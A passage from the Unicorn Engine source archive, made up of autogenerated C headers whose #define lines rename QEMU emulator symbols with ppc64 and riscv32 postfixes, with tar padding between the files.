helper_fixup_thrm helper_fixup_thrm_ppc64 #define store_40x_sler store_40x_sler_ppc64 #define dump_mmu dump_mmu_ppc64 #define ppc_cpu_get_phys_page_debug ppc_cpu_get_phys_page_debug_ppc64 #define helper_store_ibatu helper_store_ibatu_ppc64 #define helper_store_ibatl helper_store_ibatl_ppc64 #define helper_store_dbatu helper_store_dbatu_ppc64 #define helper_store_dbatl helper_store_dbatl_ppc64 #define helper_store_601_batu helper_store_601_batu_ppc64 #define helper_store_601_batl helper_store_601_batl_ppc64 #define ppc_tlb_invalidate_all ppc_tlb_invalidate_all_ppc64 #define ppc_tlb_invalidate_one ppc_tlb_invalidate_one_ppc64 #define ppc_store_sdr1 ppc_store_sdr1_ppc64 #define helper_load_sr helper_load_sr_ppc64 #define helper_store_sr helper_store_sr_ppc64 #define helper_tlbia helper_tlbia_ppc64 #define helper_tlbie helper_tlbie_ppc64 #define helper_tlbiva helper_tlbiva_ppc64 #define helper_6xx_tlbd helper_6xx_tlbd_ppc64 #define helper_6xx_tlbi helper_6xx_tlbi_ppc64 #define helper_74xx_tlbd helper_74xx_tlbd_ppc64 #define helper_74xx_tlbi helper_74xx_tlbi_ppc64 #define helper_rac helper_rac_ppc64 #define helper_4xx_tlbre_hi helper_4xx_tlbre_hi_ppc64 #define helper_4xx_tlbre_lo helper_4xx_tlbre_lo_ppc64 #define helper_4xx_tlbwe_hi helper_4xx_tlbwe_hi_ppc64 #define helper_4xx_tlbwe_lo helper_4xx_tlbwe_lo_ppc64 #define helper_4xx_tlbsx helper_4xx_tlbsx_ppc64 #define helper_440_tlbwe helper_440_tlbwe_ppc64 #define helper_440_tlbre helper_440_tlbre_ppc64 #define helper_440_tlbsx helper_440_tlbsx_ppc64 #define helper_booke_setpid helper_booke_setpid_ppc64 #define helper_booke_set_eplc helper_booke_set_eplc_ppc64 #define helper_booke_set_epsc helper_booke_set_epsc_ppc64 #define helper_booke206_tlbwe helper_booke206_tlbwe_ppc64 #define helper_booke206_tlbre helper_booke206_tlbre_ppc64 #define helper_booke206_tlbsx helper_booke206_tlbsx_ppc64 #define helper_booke206_tlbivax helper_booke206_tlbivax_ppc64 #define helper_booke206_tlbilx0 helper_booke206_tlbilx0_ppc64 #define helper_booke206_tlbilx1 helper_booke206_tlbilx1_ppc64 #define helper_booke206_tlbilx3 helper_booke206_tlbilx3_ppc64 #define helper_booke206_tlbflush helper_booke206_tlbflush_ppc64 #define helper_check_tlb_flush_local helper_check_tlb_flush_local_ppc64 #define helper_check_tlb_flush_global helper_check_tlb_flush_global_ppc64 #define ppc_cpu_tlb_fill ppc_cpu_tlb_fill_ppc64 #define helper_load_tbl helper_load_tbl_ppc64 #define helper_load_tbu helper_load_tbu_ppc64 #define helper_load_atbl helper_load_atbl_ppc64 #define helper_load_atbu helper_load_atbu_ppc64 #define helper_load_vtb helper_load_vtb_ppc64 #define helper_load_601_rtcl helper_load_601_rtcl_ppc64 #define helper_load_601_rtcu helper_load_601_rtcu_ppc64 #define helper_store_tbl helper_store_tbl_ppc64 #define helper_store_tbu helper_store_tbu_ppc64 #define helper_store_atbl helper_store_atbl_ppc64 #define helper_store_atbu helper_store_atbu_ppc64 #define helper_store_601_rtcl helper_store_601_rtcl_ppc64 #define helper_store_601_rtcu helper_store_601_rtcu_ppc64 #define helper_load_decr helper_load_decr_ppc64 #define helper_store_decr helper_store_decr_ppc64 #define helper_load_hdecr helper_load_hdecr_ppc64 #define helper_store_hdecr helper_store_hdecr_ppc64 #define helper_store_vtb helper_store_vtb_ppc64 #define helper_store_tbu40 helper_store_tbu40_ppc64 #define helper_load_40x_pit helper_load_40x_pit_ppc64 #define helper_store_40x_pit helper_store_40x_pit_ppc64 #define helper_store_booke_tcr helper_store_booke_tcr_ppc64 #define helper_store_booke_tsr helper_store_booke_tsr_ppc64 #define helper_load_dcr helper_load_dcr_ppc64 #define helper_store_dcr helper_store_dcr_ppc64 #define helper_raise_exception helper_raise_exception_ppc64 #define helper_book3s_msgsnd helper_book3s_msgsnd_ppc64 #define helper_cmpb helper_cmpb_ppc64 #define helper_mfvscr helper_mfvscr_ppc64 #define helper_vaddshs helper_vaddshs_ppc64 #define helper_vavguw helper_vavguw_ppc64 #define helper_vcmpequh helper_vcmpequh_ppc64 #define helper_vcmpequh_dot helper_vcmpequh_dot_ppc64 #define helper_vcmpnezh helper_vcmpnezh_ppc64 #define helper_vcmpnezh_dot helper_vcmpnezh_dot_ppc64 #define helper_vmsumshm helper_vmsumshm_ppc64 #define helper_vmsumuhs helper_vmsumuhs_ppc64 #define helper_vmulosh helper_vmulosh_ppc64 #define helper_vmulosw helper_vmulosw_ppc64 #define helper_vbpermq helper_vbpermq_ppc64 #define helper_vextsw2d helper_vextsw2d_ppc64 #define helper_stmw helper_stmw_ppc64 #define ppc_translate_init ppc_translate_init_ppc64 #define cpu_ppc_init cpu_ppc_init_ppc64 #define gen_intermediate_code gen_intermediate_code_ppc64 #define restore_state_to_opc restore_state_to_opc_ppc64 #define ppc_set_irq ppc_set_irq_ppc64 #define ppc6xx_irq_init ppc6xx_irq_init_ppc64 #define ppc40x_core_reset ppc40x_core_reset_ppc64 #define ppc40x_chip_reset ppc40x_chip_reset_ppc64 #define ppc40x_system_reset ppc40x_system_reset_ppc64 #define store_40x_dbcr0 store_40x_dbcr0_ppc64 #define ppc40x_irq_init ppc40x_irq_init_ppc64 #define ppce500_irq_init ppce500_irq_init_ppc64 #define ppce500_set_mpic_proxy ppce500_set_mpic_proxy_ppc64 #define cpu_ppc_get_tb cpu_ppc_get_tb_ppc64 #define cpu_ppc_load_tbl cpu_ppc_load_tbl_ppc64 #define cpu_ppc_load_tbu cpu_ppc_load_tbu_ppc64 #define cpu_ppc_store_tbl cpu_ppc_store_tbl_ppc64 #define cpu_ppc_store_tbu cpu_ppc_store_tbu_ppc64 #define cpu_ppc_load_atbl cpu_ppc_load_atbl_ppc64 #define cpu_ppc_load_atbu cpu_ppc_load_atbu_ppc64 #define cpu_ppc_store_atbl cpu_ppc_store_atbl_ppc64 #define cpu_ppc_store_atbu cpu_ppc_store_atbu_ppc64 #define cpu_ppc_load_vtb cpu_ppc_load_vtb_ppc64 #define cpu_ppc_store_vtb cpu_ppc_store_vtb_ppc64 #define cpu_ppc_store_tbu40 cpu_ppc_store_tbu40_ppc64 #define ppc_decr_clear_on_delivery ppc_decr_clear_on_delivery_ppc64 #define cpu_ppc_load_decr cpu_ppc_load_decr_ppc64 #define cpu_ppc_load_hdecr cpu_ppc_load_hdecr_ppc64 #define cpu_ppc_load_purr cpu_ppc_load_purr_ppc64 #define cpu_ppc_store_decr cpu_ppc_store_decr_ppc64 #define cpu_ppc_store_hdecr cpu_ppc_store_hdecr_ppc64 #define cpu_ppc_store_purr cpu_ppc_store_purr_ppc64 #define cpu_ppc_tb_init cpu_ppc_tb_init_ppc64 #define cpu_ppc601_load_rtcu cpu_ppc601_load_rtcu_ppc64 #define cpu_ppc601_store_rtcu cpu_ppc601_store_rtcu_ppc64 #define cpu_ppc601_load_rtcl cpu_ppc601_load_rtcl_ppc64 #define cpu_ppc601_store_rtcl cpu_ppc601_store_rtcl_ppc64 #define load_40x_pit load_40x_pit_ppc64 #define store_40x_pit store_40x_pit_ppc64 #define ppc_40x_timers_init ppc_40x_timers_init_ppc64 #define ppc_dcr_read ppc_dcr_read_ppc64 #define ppc_dcr_write ppc_dcr_write_ppc64 #define ppc_dcr_register ppc_dcr_register_ppc64 #define ppc_dcr_init ppc_dcr_init_ppc64 #define ppc_cpu_pir ppc_cpu_pir_ppc64 #define ppc_irq_reset ppc_irq_reset_ppc64 #define store_booke_tsr store_booke_tsr_ppc64 #define get_pteg_offset32 get_pteg_offset32_ppc64 #define ppc_booke_timers_init ppc_booke_timers_init_ppc64 #define ppc_hash32_handle_mmu_fault ppc_hash32_handle_mmu_fault_ppc64 #define gen_helper_store_booke_tsr gen_helper_store_booke_tsr_ppc64 #define gen_helper_store_booke_tcr gen_helper_store_booke_tcr_ppc64 #define store_booke_tcr store_booke_tcr_ppc64 #define ppc_hash32_get_phys_page_debug ppc_hash32_get_phys_page_debug_ppc64 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/riscv32.h������������������������������������������������������������������������0000664�0000000�0000000�00000234230�14675241067�0015623�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_riscv32_H #define UNICORN_AUTOGEN_riscv32_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _riscv32 #endif #define unicorn_fill_tlb unicorn_fill_tlb_riscv32 #define reg_read reg_read_riscv32 #define reg_write reg_write_riscv32 #define uc_init uc_init_riscv32 #define uc_add_inline_hook uc_add_inline_hook_riscv32 #define uc_del_inline_hook uc_del_inline_hook_riscv32 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv32 #define use_idiv_instructions use_idiv_instructions_riscv32 #define arm_arch arm_arch_riscv32 #define tb_target_set_jmp_target tb_target_set_jmp_target_riscv32 #define have_bmi1 have_bmi1_riscv32 #define have_popcnt have_popcnt_riscv32 #define have_avx1 have_avx1_riscv32 #define have_avx2 have_avx2_riscv32 #define have_isa have_isa_riscv32 #define have_altivec have_altivec_riscv32 #define have_vsx have_vsx_riscv32 #define flush_icache_range flush_icache_range_riscv32 #define s390_facilities s390_facilities_riscv32 #define tcg_dump_op tcg_dump_op_riscv32 #define tcg_dump_ops tcg_dump_ops_riscv32 #define tcg_gen_and_i64 tcg_gen_and_i64_riscv32 #define tcg_gen_discard_i64 tcg_gen_discard_i64_riscv32 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_riscv32 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_riscv32 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_riscv32 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_riscv32 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_riscv32 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_riscv32 #define tcg_gen_ld_i64 tcg_gen_ld_i64_riscv32 #define tcg_gen_mov_i64 tcg_gen_mov_i64_riscv32 #define tcg_gen_movi_i64 tcg_gen_movi_i64_riscv32 #define tcg_gen_mul_i64 tcg_gen_mul_i64_riscv32 #define tcg_gen_or_i64 tcg_gen_or_i64_riscv32 #define tcg_gen_sar_i64 tcg_gen_sar_i64_riscv32 #define tcg_gen_shl_i64 tcg_gen_shl_i64_riscv32 #define tcg_gen_shr_i64 tcg_gen_shr_i64_riscv32 #define tcg_gen_st_i64 tcg_gen_st_i64_riscv32 #define tcg_gen_xor_i64 tcg_gen_xor_i64_riscv32 #define cpu_icount_to_ns cpu_icount_to_ns_riscv32 #define cpu_is_stopped cpu_is_stopped_riscv32 #define cpu_get_ticks cpu_get_ticks_riscv32 #define cpu_get_clock cpu_get_clock_riscv32 #define cpu_resume cpu_resume_riscv32 #define qemu_init_vcpu qemu_init_vcpu_riscv32 #define cpu_stop_current cpu_stop_current_riscv32 #define resume_all_vcpus resume_all_vcpus_riscv32 #define vm_start vm_start_riscv32 #define address_space_dispatch_compact address_space_dispatch_compact_riscv32 #define flatview_translate flatview_translate_riscv32 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_riscv32 #define qemu_get_cpu qemu_get_cpu_riscv32 #define cpu_address_space_init cpu_address_space_init_riscv32 #define cpu_get_address_space cpu_get_address_space_riscv32 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_riscv32 #define cpu_exec_initfn cpu_exec_initfn_riscv32 #define cpu_exec_realizefn cpu_exec_realizefn_riscv32 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_riscv32 #define cpu_watchpoint_insert cpu_watchpoint_insert_riscv32 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_riscv32 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_riscv32 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_riscv32 #define cpu_breakpoint_insert cpu_breakpoint_insert_riscv32 #define cpu_breakpoint_remove cpu_breakpoint_remove_riscv32 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_riscv32 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_riscv32 #define cpu_abort cpu_abort_riscv32 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_riscv32 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_riscv32 #define flatview_add_to_dispatch flatview_add_to_dispatch_riscv32 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_riscv32 #define qemu_ram_get_offset qemu_ram_get_offset_riscv32 #define qemu_ram_get_used_length qemu_ram_get_used_length_riscv32 #define qemu_ram_is_shared qemu_ram_is_shared_riscv32 #define qemu_ram_pagesize qemu_ram_pagesize_riscv32 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_riscv32 #define qemu_ram_alloc qemu_ram_alloc_riscv32 #define qemu_ram_free qemu_ram_free_riscv32 #define qemu_map_ram_ptr qemu_map_ram_ptr_riscv32 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_riscv32 #define qemu_ram_block_from_host qemu_ram_block_from_host_riscv32 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_riscv32 #define cpu_check_watchpoint cpu_check_watchpoint_riscv32 #define iotlb_to_section iotlb_to_section_riscv32 #define address_space_dispatch_new address_space_dispatch_new_riscv32 #define address_space_dispatch_free address_space_dispatch_free_riscv32 #define flatview_read_continue flatview_read_continue_riscv32 #define address_space_read_full address_space_read_full_riscv32 #define address_space_write address_space_write_riscv32 #define address_space_rw address_space_rw_riscv32 #define cpu_physical_memory_rw cpu_physical_memory_rw_riscv32 #define address_space_write_rom address_space_write_rom_riscv32 #define cpu_flush_icache_range cpu_flush_icache_range_riscv32 #define cpu_exec_init_all cpu_exec_init_all_riscv32 #define address_space_access_valid address_space_access_valid_riscv32 #define address_space_map address_space_map_riscv32 #define address_space_unmap address_space_unmap_riscv32 #define cpu_physical_memory_map cpu_physical_memory_map_riscv32 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_riscv32 #define cpu_memory_rw_debug cpu_memory_rw_debug_riscv32 #define qemu_target_page_size qemu_target_page_size_riscv32 #define qemu_target_page_bits qemu_target_page_bits_riscv32 #define qemu_target_page_bits_min qemu_target_page_bits_min_riscv32 #define target_words_bigendian target_words_bigendian_riscv32 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_riscv32 #define ram_block_discard_range ram_block_discard_range_riscv32 #define ramblock_is_pmem ramblock_is_pmem_riscv32 #define page_size_init page_size_init_riscv32 #define set_preferred_target_page_bits set_preferred_target_page_bits_riscv32 #define finalize_target_page_bits finalize_target_page_bits_riscv32 #define cpu_outb cpu_outb_riscv32 #define cpu_outw cpu_outw_riscv32 #define cpu_outl cpu_outl_riscv32 #define cpu_inb cpu_inb_riscv32 #define cpu_inw cpu_inw_riscv32 #define cpu_inl cpu_inl_riscv32 #define memory_map memory_map_riscv32 #define memory_map_io memory_map_io_riscv32 #define memory_map_ptr memory_map_ptr_riscv32 #define memory_cow memory_cow_riscv32 #define memory_unmap memory_unmap_riscv32 #define memory_moveout memory_moveout_riscv32 #define memory_movein memory_movein_riscv32 #define memory_free memory_free_riscv32 #define flatview_unref flatview_unref_riscv32 #define address_space_get_flatview address_space_get_flatview_riscv32 #define memory_region_transaction_begin memory_region_transaction_begin_riscv32 #define memory_region_transaction_commit memory_region_transaction_commit_riscv32 #define memory_region_init memory_region_init_riscv32 #define memory_region_access_valid memory_region_access_valid_riscv32 #define memory_region_dispatch_read memory_region_dispatch_read_riscv32 #define memory_region_dispatch_write memory_region_dispatch_write_riscv32 #define memory_region_init_io memory_region_init_io_riscv32 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_riscv32 #define memory_region_size memory_region_size_riscv32 #define memory_region_set_readonly memory_region_set_readonly_riscv32 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_riscv32 #define memory_region_from_host memory_region_from_host_riscv32 #define memory_region_get_ram_addr memory_region_get_ram_addr_riscv32 #define memory_region_add_subregion memory_region_add_subregion_riscv32 #define memory_region_del_subregion memory_region_del_subregion_riscv32 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_riscv32 #define memory_region_find memory_region_find_riscv32 #define memory_region_filter_subregions memory_region_filter_subregions_riscv32 #define memory_listener_register memory_listener_register_riscv32 #define memory_listener_unregister memory_listener_unregister_riscv32 #define address_space_remove_listeners address_space_remove_listeners_riscv32 #define address_space_init address_space_init_riscv32 #define address_space_destroy address_space_destroy_riscv32 #define memory_region_init_ram memory_region_init_ram_riscv32 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_riscv32 #define find_memory_mapping find_memory_mapping_riscv32 #define exec_inline_op exec_inline_op_riscv32 #define floatx80_default_nan floatx80_default_nan_riscv32 #define float_raise float_raise_riscv32 #define float16_is_quiet_nan float16_is_quiet_nan_riscv32 #define float16_is_signaling_nan float16_is_signaling_nan_riscv32 #define float32_is_quiet_nan float32_is_quiet_nan_riscv32 #define float32_is_signaling_nan float32_is_signaling_nan_riscv32 #define float64_is_quiet_nan float64_is_quiet_nan_riscv32 #define float64_is_signaling_nan float64_is_signaling_nan_riscv32 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_riscv32 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_riscv32 #define floatx80_silence_nan floatx80_silence_nan_riscv32 #define propagateFloatx80NaN propagateFloatx80NaN_riscv32 #define float128_is_quiet_nan float128_is_quiet_nan_riscv32 #define float128_is_signaling_nan float128_is_signaling_nan_riscv32 #define float128_silence_nan float128_silence_nan_riscv32 #define float16_add float16_add_riscv32 #define float16_sub float16_sub_riscv32 #define float32_add float32_add_riscv32 #define float32_sub float32_sub_riscv32 #define float64_add float64_add_riscv32 #define float64_sub float64_sub_riscv32 #define float16_mul float16_mul_riscv32 #define float32_mul float32_mul_riscv32 #define float64_mul float64_mul_riscv32 #define float16_muladd float16_muladd_riscv32 #define float32_muladd float32_muladd_riscv32 #define float64_muladd float64_muladd_riscv32 #define float16_div float16_div_riscv32 #define float32_div float32_div_riscv32 #define float64_div float64_div_riscv32 #define float16_to_float32 float16_to_float32_riscv32 #define float16_to_float64 float16_to_float64_riscv32 #define float32_to_float16 float32_to_float16_riscv32 #define float32_to_float64 float32_to_float64_riscv32 #define float64_to_float16 float64_to_float16_riscv32 #define float64_to_float32 float64_to_float32_riscv32 #define float16_round_to_int float16_round_to_int_riscv32 #define float32_round_to_int float32_round_to_int_riscv32 #define float64_round_to_int float64_round_to_int_riscv32 #define float16_to_int16_scalbn float16_to_int16_scalbn_riscv32 #define float16_to_int32_scalbn float16_to_int32_scalbn_riscv32 #define float16_to_int64_scalbn float16_to_int64_scalbn_riscv32 #define float32_to_int16_scalbn float32_to_int16_scalbn_riscv32 #define float32_to_int32_scalbn float32_to_int32_scalbn_riscv32 #define float32_to_int64_scalbn float32_to_int64_scalbn_riscv32 #define float64_to_int16_scalbn float64_to_int16_scalbn_riscv32 #define float64_to_int32_scalbn float64_to_int32_scalbn_riscv32 #define float64_to_int64_scalbn float64_to_int64_scalbn_riscv32 #define float16_to_int16 float16_to_int16_riscv32 #define float16_to_int32 float16_to_int32_riscv32 #define float16_to_int64 float16_to_int64_riscv32 #define float32_to_int16 float32_to_int16_riscv32 #define float32_to_int32 float32_to_int32_riscv32 #define float32_to_int64 float32_to_int64_riscv32 #define float64_to_int16 float64_to_int16_riscv32 #define float64_to_int32 float64_to_int32_riscv32 #define float64_to_int64 float64_to_int64_riscv32 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_riscv32 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_riscv32 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_riscv32 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_riscv32 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_riscv32 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_riscv32 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_riscv32 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_riscv32 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_riscv32 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_riscv32 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_riscv32 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_riscv32 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_riscv32 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_riscv32 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_riscv32 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_riscv32 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_riscv32 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_riscv32 #define float16_to_uint16 float16_to_uint16_riscv32 #define float16_to_uint32 float16_to_uint32_riscv32 #define float16_to_uint64 float16_to_uint64_riscv32 #define float32_to_uint16 float32_to_uint16_riscv32 #define float32_to_uint32 float32_to_uint32_riscv32 #define float32_to_uint64 float32_to_uint64_riscv32 #define float64_to_uint16 float64_to_uint16_riscv32 #define float64_to_uint32 float64_to_uint32_riscv32 #define float64_to_uint64 float64_to_uint64_riscv32 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_riscv32 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_riscv32 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_riscv32 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_riscv32 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_riscv32 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_riscv32 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_riscv32 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_riscv32 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_riscv32 #define int64_to_float16_scalbn int64_to_float16_scalbn_riscv32 #define int32_to_float16_scalbn int32_to_float16_scalbn_riscv32 #define int16_to_float16_scalbn int16_to_float16_scalbn_riscv32 #define int64_to_float16 int64_to_float16_riscv32 #define int32_to_float16 int32_to_float16_riscv32 #define int16_to_float16 int16_to_float16_riscv32 #define int64_to_float32_scalbn int64_to_float32_scalbn_riscv32 #define int32_to_float32_scalbn int32_to_float32_scalbn_riscv32 #define int16_to_float32_scalbn int16_to_float32_scalbn_riscv32 #define int64_to_float32 int64_to_float32_riscv32 #define int32_to_float32 int32_to_float32_riscv32 #define int16_to_float32 int16_to_float32_riscv32 #define int64_to_float64_scalbn int64_to_float64_scalbn_riscv32 #define int32_to_float64_scalbn int32_to_float64_scalbn_riscv32 #define int16_to_float64_scalbn int16_to_float64_scalbn_riscv32 #define int64_to_float64 int64_to_float64_riscv32 #define int32_to_float64 int32_to_float64_riscv32 #define int16_to_float64 int16_to_float64_riscv32 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_riscv32 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_riscv32 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_riscv32 #define uint64_to_float16 uint64_to_float16_riscv32 #define uint32_to_float16 uint32_to_float16_riscv32 #define uint16_to_float16 uint16_to_float16_riscv32 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_riscv32 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_riscv32 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_riscv32 #define uint64_to_float32 uint64_to_float32_riscv32 #define uint32_to_float32 uint32_to_float32_riscv32 #define uint16_to_float32 uint16_to_float32_riscv32 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_riscv32 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_riscv32 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_riscv32 #define uint64_to_float64 uint64_to_float64_riscv32 #define uint32_to_float64 uint32_to_float64_riscv32 #define uint16_to_float64 uint16_to_float64_riscv32 #define float16_min float16_min_riscv32 #define float16_minnum float16_minnum_riscv32 #define float16_minnummag float16_minnummag_riscv32 #define float16_max float16_max_riscv32 #define float16_maxnum float16_maxnum_riscv32 #define float16_maxnummag float16_maxnummag_riscv32 #define float32_min float32_min_riscv32 #define float32_minnum float32_minnum_riscv32 #define float32_minnummag float32_minnummag_riscv32 #define float32_max float32_max_riscv32 #define float32_maxnum float32_maxnum_riscv32 #define float32_maxnummag float32_maxnummag_riscv32 #define float64_min float64_min_riscv32 #define float64_minnum float64_minnum_riscv32 #define float64_minnummag float64_minnummag_riscv32 #define float64_max float64_max_riscv32 #define float64_maxnum float64_maxnum_riscv32 #define float64_maxnummag float64_maxnummag_riscv32 #define float16_compare float16_compare_riscv32 #define float16_compare_quiet float16_compare_quiet_riscv32 #define float32_compare float32_compare_riscv32 #define float32_compare_quiet float32_compare_quiet_riscv32 #define float64_compare float64_compare_riscv32 #define float64_compare_quiet float64_compare_quiet_riscv32 #define float16_scalbn float16_scalbn_riscv32 #define float32_scalbn float32_scalbn_riscv32 #define float64_scalbn float64_scalbn_riscv32 #define float16_sqrt float16_sqrt_riscv32 #define float32_sqrt float32_sqrt_riscv32 #define float64_sqrt float64_sqrt_riscv32 #define float16_default_nan float16_default_nan_riscv32 #define float32_default_nan float32_default_nan_riscv32 #define float64_default_nan float64_default_nan_riscv32 #define float128_default_nan float128_default_nan_riscv32 #define float16_silence_nan float16_silence_nan_riscv32 #define float32_silence_nan float32_silence_nan_riscv32 #define float64_silence_nan float64_silence_nan_riscv32 #define float16_squash_input_denormal float16_squash_input_denormal_riscv32 #define float32_squash_input_denormal float32_squash_input_denormal_riscv32 #define float64_squash_input_denormal float64_squash_input_denormal_riscv32 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_riscv32 #define roundAndPackFloatx80 roundAndPackFloatx80_riscv32 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_riscv32 #define int32_to_floatx80 int32_to_floatx80_riscv32 #define int32_to_float128 int32_to_float128_riscv32 #define int64_to_floatx80 int64_to_floatx80_riscv32 #define int64_to_float128 int64_to_float128_riscv32 #define uint64_to_float128 uint64_to_float128_riscv32 #define float32_to_floatx80 float32_to_floatx80_riscv32 #define float32_to_float128 float32_to_float128_riscv32 #define float32_rem float32_rem_riscv32 #define float32_exp2 float32_exp2_riscv32 #define float32_log2 float32_log2_riscv32 #define float32_eq float32_eq_riscv32 #define float32_le float32_le_riscv32 #define float32_lt float32_lt_riscv32 #define float32_unordered float32_unordered_riscv32 #define float32_eq_quiet float32_eq_quiet_riscv32 #define float32_le_quiet float32_le_quiet_riscv32 #define float32_lt_quiet float32_lt_quiet_riscv32 #define float32_unordered_quiet float32_unordered_quiet_riscv32 #define float64_to_floatx80 float64_to_floatx80_riscv32 #define float64_to_float128 float64_to_float128_riscv32 #define float64_rem float64_rem_riscv32 #define float64_log2 float64_log2_riscv32 #define float64_eq float64_eq_riscv32 #define float64_le float64_le_riscv32 #define float64_lt float64_lt_riscv32 #define float64_unordered float64_unordered_riscv32 #define float64_eq_quiet float64_eq_quiet_riscv32 #define float64_le_quiet float64_le_quiet_riscv32 #define float64_lt_quiet float64_lt_quiet_riscv32 #define float64_unordered_quiet float64_unordered_quiet_riscv32 #define floatx80_to_int32 floatx80_to_int32_riscv32 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_riscv32 #define floatx80_to_int64 floatx80_to_int64_riscv32 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_riscv32 #define floatx80_to_float32 floatx80_to_float32_riscv32 #define floatx80_to_float64 floatx80_to_float64_riscv32 #define floatx80_to_float128 floatx80_to_float128_riscv32 #define floatx80_round floatx80_round_riscv32 #define floatx80_round_to_int floatx80_round_to_int_riscv32 #define floatx80_add floatx80_add_riscv32 #define floatx80_sub floatx80_sub_riscv32 #define floatx80_mul floatx80_mul_riscv32 #define floatx80_div floatx80_div_riscv32 #define floatx80_rem floatx80_rem_riscv32 #define floatx80_sqrt floatx80_sqrt_riscv32 #define floatx80_eq floatx80_eq_riscv32 #define floatx80_le floatx80_le_riscv32 #define floatx80_lt floatx80_lt_riscv32 #define floatx80_unordered floatx80_unordered_riscv32 #define floatx80_eq_quiet floatx80_eq_quiet_riscv32 #define floatx80_le_quiet floatx80_le_quiet_riscv32 #define floatx80_lt_quiet floatx80_lt_quiet_riscv32 #define floatx80_unordered_quiet floatx80_unordered_quiet_riscv32 #define float128_to_int32 float128_to_int32_riscv32 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_riscv32 #define float128_to_int64 float128_to_int64_riscv32 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_riscv32 #define float128_to_uint64 float128_to_uint64_riscv32 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_riscv32 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_riscv32 #define float128_to_uint32 float128_to_uint32_riscv32 #define float128_to_float32 float128_to_float32_riscv32 #define float128_to_float64 float128_to_float64_riscv32 #define float128_to_floatx80 float128_to_floatx80_riscv32 #define float128_round_to_int float128_round_to_int_riscv32 #define float128_add float128_add_riscv32 #define float128_sub float128_sub_riscv32 #define float128_mul float128_mul_riscv32 #define float128_div float128_div_riscv32 #define float128_rem float128_rem_riscv32 #define float128_sqrt float128_sqrt_riscv32 #define float128_eq float128_eq_riscv32 #define float128_le float128_le_riscv32 #define float128_lt 